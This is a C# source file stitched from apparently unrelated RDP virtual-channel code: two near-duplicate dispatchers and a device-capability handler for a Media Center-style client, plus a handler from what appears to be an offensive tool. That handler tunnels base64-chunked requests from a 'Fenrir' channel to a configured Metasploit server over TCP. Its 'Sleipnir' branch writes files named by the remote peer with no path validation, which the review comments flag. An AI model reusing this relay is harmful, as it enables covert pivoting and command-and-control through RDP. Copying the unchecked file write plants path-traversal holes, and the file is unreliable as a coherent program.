/// <summary>
/// Dispatches data received on an RDP virtual channel to the handler for that channel.
/// </summary>
/// <param name="sender">Event source (unused).</param>
/// <param name="e">Channel event; <c>chanName</c> selects the handler and <c>data</c> is the payload.</param>
/// <remarks>
/// Any exception thrown by a handler is caught here and shown to the user, so the
/// control's event callback never propagates an unhandled exception.
/// Data on a channel with no handler is reported in a message box rather than dropped silently.
/// </remarks>
void rdpClient_OnChannelReceivedData(object sender, AxMSTSCLib.IMsTscAxEvents_OnChannelReceivedDataEvent e)
{
    try
    {
        // Verbose channel tracing is opt-in via the debug checkbox; McxSess is excluded from it.
        bool traceChannel = chkInVchanDebug.Checked && e.chanName != "McxSess";
        if (traceChannel)
        {
            m_logger.LogDebug("RDP: Received data on channel " + e.chanName);
        }

        switch (e.chanName)
        {
            case "devcaps":
                HandleDevCapsIncoming(e);
                break;
            case "McxSess":
                HandleMcxSessIncoming(e.data);
                break;
            case "avctrl":
                HandleAvctrlIncoming(e.data);
                break;
            default:
                MessageBox.Show("unhandled data on channel " + e.chanName);
                break;
        }
    }
    catch (Exception ex)
    {
        MessageBox.Show(ex.Message + " " + ex.StackTrace);
    }
}
/// <summary>
/// Routes an RDP virtual-channel message to the handler registered for its channel name.
/// </summary>
/// <param name="sender">Event source (unused).</param>
/// <param name="e">Channel event; <c>chanName</c> picks the handler and <c>data</c> is forwarded to it.</param>
/// <remarks>
/// Handler exceptions are caught and surfaced in a message box rather than propagating
/// out of the control's event dispatch. Unknown channel names are reported, not ignored.
/// </remarks>
void RdpClient_OnChannelReceivedData(object sender, AxMSTSCLib.IMsTscAxEvents_OnChannelReceivedDataEvent e)
{
    try
    {
        string channel = e.chanName;
        switch (channel)
        {
            case "avctrl":
                AvCtrlHandler.ProcessData(e.data);
                break;
            case "devcaps":
                DevCapsHandler.ProcessData(e.data);
                break;
            case "McxSess":
                McxSessHandler.ProcessData(e.data);
                break;
            default:
                MessageBox.Show("unhandled data on channel " + channel);
                break;
        }
    }
    catch (Exception caught)
    {
        MessageBox.Show(caught.Message + " " + caught.StackTrace);
    }
}
/// <summary>
/// Handles raw data arriving on any RDP virtual channel. Two protocols are multiplexed
/// here and told apart only by channel name: "Fenrir" relays a base64-chunked request to
/// the host in <c>Form1.sMetasploitServer</c>:<c>Form1.iMetasploitPort</c> over TCP and
/// streams the reply back, and every other channel is treated as the "Sleipnir" file
/// transfer, which writes incoming chunks to a local file and acknowledges on "Loki1".
/// </summary>
/// <param name="sender">Event source (unused).</param>
/// <param name="e">Channel event; <c>chanName</c> selects the protocol, <c>data</c> is the payload.</param>
/// <remarks>
/// NOTE(review): state is kept in the fields <c>sFenrirReceivedRequest</c>, <c>sTitle</c> and
/// <c>sTitleTrimmed</c> across messages, and <c>Application.DoEvents()</c> is called while a
/// request is in flight, so this handler can re-enter itself — confirm the control raises
/// this event on the UI thread before relying on the ordering below.
/// Nothing in this method catches the <see cref="FormatException"/> that
/// <c>Convert.FromBase64String</c> throws on malformed input.
/// </remarks>
private void rdp_OnChannelReceivedData(object sender, AxMSTSCLib.IMsTscAxEvents_OnChannelReceivedDataEvent e)
{
    // Round-tripping both strings through UTF-16 bytes yields copies; for well-formed input
    // str == e.data and channelName == e.chanName (presumably a defensive copy — confirm).
    byte[] Data = System.Text.Encoding.Unicode.GetBytes(e.data);
    string str = System.Text.Encoding.Unicode.GetString(Data);
    byte[] Channel = System.Text.Encoding.Unicode.GetBytes(e.chanName);
    string channelName = System.Text.Encoding.Unicode.GetString(Channel);
    // Stored for use elsewhere; not read again in this method.
    FileContent = Data;
    //Handle Fenrir traffic
    if (channelName == "Fenrir")
    {
        // Protocol: "Start of Request", then base64 chunks, then "End of Request".
        // Every message is acknowledged with "Received".
        if (str == "Start of Request")
        {
            sFenrirReceivedRequest = "";
            rdp.SendOnVirtualChannel("Fenrir", "Received");
        }
        else if (str == "End of Request")
        {
            //strip the trailing null
            sFenrirReceivedRequest = sFenrirReceivedRequest.Replace("\0", "");
            //convert from base64string
            byte[] bFenrirReceivedRequest = Convert.FromBase64String(sFenrirReceivedRequest);
            //view the string
            string decodedFenrirReceivedRequest = Encoding.UTF8.GetString(bFenrirReceivedRequest);
            //convert the string to a byte array so it can be forwarded on.
            if (decodedFenrirReceivedRequest != "")
            {
                rdp.SendOnVirtualChannel("Fenrir", "Received");
                // NOTE(review): 'match' is computed but never read; the request line is
                // parsed and then discarded, and the destination comes from Form1 instead.
                Match match = Regex.Match(decodedFenrirReceivedRequest, @"(?<method>[A-Z]+) (?<protocol>[A-Za-z0-9]+://)?(?<host>[A-Za-z0-9\.]+)?(:)?(?<port>[0-9]+)?(?<directory>[A-Za-z0-9\./\?\&\=]+)? 
(HTTP\/[0-9\.]+)", RegexOptions.IgnoreCase);
                string host = Form1.sMetasploitServer;
                int port = Form1.iMetasploitPort;
                Application.DoEvents();
                //The below is for forwarding the packet on once we strip the IP and port from the packet
                // NOTE(review): 'client' is never disposed, so every request leaks a socket.
                TcpClient client = new TcpClient();
                //check if its an IP address, if not assume hostname
                try
                {
                    IPAddress oAddress = null;
                    if (IPAddress.TryParse(host, out oAddress))
                    {
                        IPEndPoint serverEndPoint = new IPEndPoint(oAddress, port);
                        client.Connect(serverEndPoint);
                    }
                    else
                    {
                        client.Connect(host, port);
                    }
                }
                catch (Exception error)
                {
                    // NOTE(review): a failed connect only shows a dialog; execution falls
                    // through to GetStream() on an unconnected client, which throws
                    // InvalidOperationException out of this handler.
                    MessageBox.Show(error.ToString());
                }
                NetworkStream clientStream = client.GetStream();
                ASCIIEncoding encoder = new ASCIIEncoding();
                clientStream.Write(bFenrirReceivedRequest, 0, bFenrirReceivedRequest.Length);
                //Log the requests sent
                // Request bodies are appended in clear text to Fenrir.log, a path relative
                // to the current working directory, with a current-culture timestamp.
                using (System.IO.StreamWriter file = new System.IO.StreamWriter(@"Fenrir.log", true))
                {
                    file.WriteLine("Request " + DateTime.Now.ToString("dd/MM/yyyy h:mm:ss tt"));
                    file.Write(encoder.GetString(bFenrirReceivedRequest, 0, bFenrirReceivedRequest.Length));
                }
                Array.Clear(bFenrirReceivedRequest, 0, bFenrirReceivedRequest.Length);
                byte[] bResponse = new byte[1024];
                int bytesRead = 0;
                // Read() returns 0 only once the remote side closes; if it holds the
                // connection open this loop blocks here indefinitely.
                while ((bytesRead = clientStream.Read(bResponse, 0, bResponse.Length)) > 0)
                {
                    //Log the responses
                    // NOTE(review): bResponse.Length is used instead of bytesRead, so a short
                    // read still logs and forwards the full 1024-byte buffer; because the
                    // buffer is zeroed below, the unused tail is zeros rather than stale data.
                    using (System.IO.StreamWriter file = new System.IO.StreamWriter(@"Fenrir.log", true))
                    {
                        file.WriteLine("Response " + DateTime.Now.ToString("dd/MM/yyyy h:mm:ss tt"));
                        file.Write(encoder.GetString(bResponse, 0, bResponse.Length) + "\r\n");
                    }
                    // Each chunk is base64-encoded and terminated with "$" for the peer.
                    string sResponse = Convert.ToBase64String(bResponse, 0, bResponse.Length) + "$";
                    rdp.SendOnVirtualChannel("Fenrir", sResponse);
                    clientStream.Flush();
                    Array.Clear(bResponse, 0, bResponse.Length);
                    Application.DoEvents();
                }
                rdp.SendOnVirtualChannel("Fenrir", "End of Response");
                sFenrirReceivedRequest = "";
            }
            else
            {
                //DO NOTHING
                // An empty request is silently dropped and never acknowledged.
            }
        }
        else
        {
            // Any other payload is a chunk of the request body being assembled.
            sFenrirReceivedRequest += str;
            rdp.SendOnVirtualChannel("Fenrir", "Received");
        }
    }
    //If its not Fenrir then assume it is Sleipnir Traffic
    else
    {
        // The payload is base64; decoded once as UTF-16 text (for the marker checks) and
        // once as raw bytes (for writing to disk).
        string sDecode = System.Text.Encoding.Unicode.GetString(System.Convert.FromBase64String(str));
        byte[] bDecode = System.Convert.FromBase64String(str);
        //Make sure its the start of the file by checking for "title:"
        // NOTE(review): IsMatch is unanchored, so any chunk whose content contains
        // "title:" (or "!!!" below) is misclassified as a marker.
        if (System.Text.RegularExpressions.Regex.IsMatch(sDecode, "title:", System.Text.RegularExpressions.RegexOptions.IgnoreCase))
        {
            // NOTE(review): the target file name is taken verbatim from the remote peer
            // and passed to FileStream without any validation, so a relative or
            // traversal path is honoured as-is. File.Exists only prevents overwriting.
            sTitle = sDecode.Replace("title:", "");
            sTitleTrimmed = sTitle.Replace("\0", string.Empty);
            if (File.Exists(sTitleTrimmed))
            {
                MessageBox.Show("File already exists! Cancelling transfer");
                rdp.SendOnVirtualChannel("Loki1", "Cancelled");
            }
            else
            {
                // Create (truncate) the file now; chunks are appended by later messages.
                using (FileStream writeStream = new FileStream(sTitleTrimmed, FileMode.Create, FileAccess.Write))
                {
                    writeStream.Flush();
                }
                rdp.SendOnVirtualChannel("Loki1", "Received");
            }
        }
        //If its not the start then check that it is not the end by looking for !!!
        else if (System.Text.RegularExpressions.Regex.IsMatch(sDecode, "!!!", System.Text.RegularExpressions.RegexOptions.IgnoreCase))
        {
            MessageBox.Show("File successfully transferred!");
            // This return skips the buffer clearing at the end of the method.
            return;
        }
        //If its not the beginning or the end then it must be the middle :)
        else
        {
            // 'sDecodeTrimmed' is computed but never used.
            string sDecodeTrimmed = sDecode.Replace("\0", string.Empty);
            // The write length is the UTF-16 byte count of the re-encoded text, not
            // bDecode.Length; for an odd-length chunk these can differ — TODO confirm.
            byte[] filecontent = System.Text.Encoding.Unicode.GetBytes(sDecode);
            using (FileStream writeStream = new FileStream(sTitleTrimmed, FileMode.Append, FileAccess.Write))
            {
                writeStream.Write(bDecode, 0, filecontent.Length);
                writeStream.Flush();
                Array.Clear(bDecode, 0, bDecode.Length);
            }
            rdp.SendOnVirtualChannel("Loki1", "Received");
        }
    }
    // Best-effort scrubbing of the local copies; the managed strings themselves are not
    // overwritten, only dereferenced.
    str = "";
    channelName = "";
    Array.Clear(Data, 0, Data.Length);
    Array.Clear(Channel, 0, Channel.Length);
}
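/// <summary>
/// Answers one incoming "devcaps" (device capabilities) message and advances the
/// per-session sequence counter <c>devCapsIter</c>.
/// </summary>
/// <param name="e">Channel event whose <c>data</c> carries the capability request.</param>
/// <remarks>
/// The first message (<c>devCapsIter == 1</c>) is answered with the canned "Initial"
/// response. Every later message is a capability query identified by the last two bytes
/// of its UTF-16 payload; it is answered "Enabled" unless the key is in the deny list.
/// Byte 21 of the canned response is patched with the current sequence number.
/// </remarks>
/// <exception cref="ArgumentOutOfRangeException">The payload is shorter than the two-byte key.</exception>
/// <exception cref="OverflowException"><c>devCapsIter</c> no longer fits in a byte.</exception>
private void HandleDevCapsIncoming(AxMSTSCLib.IMsTscAxEvents_OnChannelReceivedDataEvent e)
{
    byte[] vChanResponseBuff;
    if (devCapsIter == 1)
    {
        // The initial response data for the initialization process.
        vChanResponseBuff = LoadDevCapsVChan("Initial");
    }
    else
    {
        // Respond true to all capability requests except those in the deny list below.
        byte[] vChanIncomingBuff = Encoding.Unicode.GetBytes(e.data);
        if (vChanIncomingBuff.Length < 2)
        {
            // Previously this surfaced as an index error inside GetString; name the cause.
            throw new ArgumentOutOfRangeException("e", "devcaps payload is shorter than the two-byte capability key");
        }

        // The key is the last two bytes of the payload read as ASCII. Invariant casing:
        // this is a protocol identifier, not user-facing text.
        string capKey = Encoding.ASCII.GetString(vChanIncomingBuff, vChanIncomingBuff.Length - 2, 2).ToUpperInvariant();
        m_logger.LogDebug("Asked for capability: " + capKey);

        // Ordinal set lookup instead of a linear List scan rebuilt on every message.
        // NOTE(review): "POP" is three characters and can never equal a two-character
        // key; kept verbatim so the list is unchanged — the intended entry may be "PO".
        HashSet<string> disabledCaps = new HashSet<string>(StringComparer.Ordinal)
        {
            "BI", // BIG - we cannot do Xbox 360 rendering
            "PH", "POP", "HO", "AR", "CR", "CP", "CD", "DR", "DV", "FP", "HC", "HT", "DO", "SC", "NL", "RS", "VO", "W3",
            "RU", // RUI - we cannot do Xbox 360 rendering
            "WI", // WID - disable widescreen for the time being.
            "TV", // TVS
            "TB", // TBP - disable the media center toolbar.
            "AN", // ANI - intensive animations over RDP look awful!
            "VI", // VIZ - can't do wmp visualisations over RDP!
            "MU", // original comment says TVS; presumably MUS — confirm
            "XT",
        };

        bool response = !disabledCaps.Contains(capKey);
        vChanResponseBuff = LoadDevCapsVChan(response ? "Enabled" : "Disabled");

        // We need to modify the sequencing integer inside the response.
        vChanResponseBuff[21] = Convert.ToByte(devCapsIter);
        m_logger.LogDebug("RDP: " + response.ToString().ToUpper() + " for capability " + capKey);
    }

    rdpClient.SendOnVirtualChannel("devcaps", Encoding.Unicode.GetString(vChanResponseBuff));
    m_logger.LogDebug("RDP: Sent devcaps citeration " + devCapsIter.ToString());
    devCapsIter++;
}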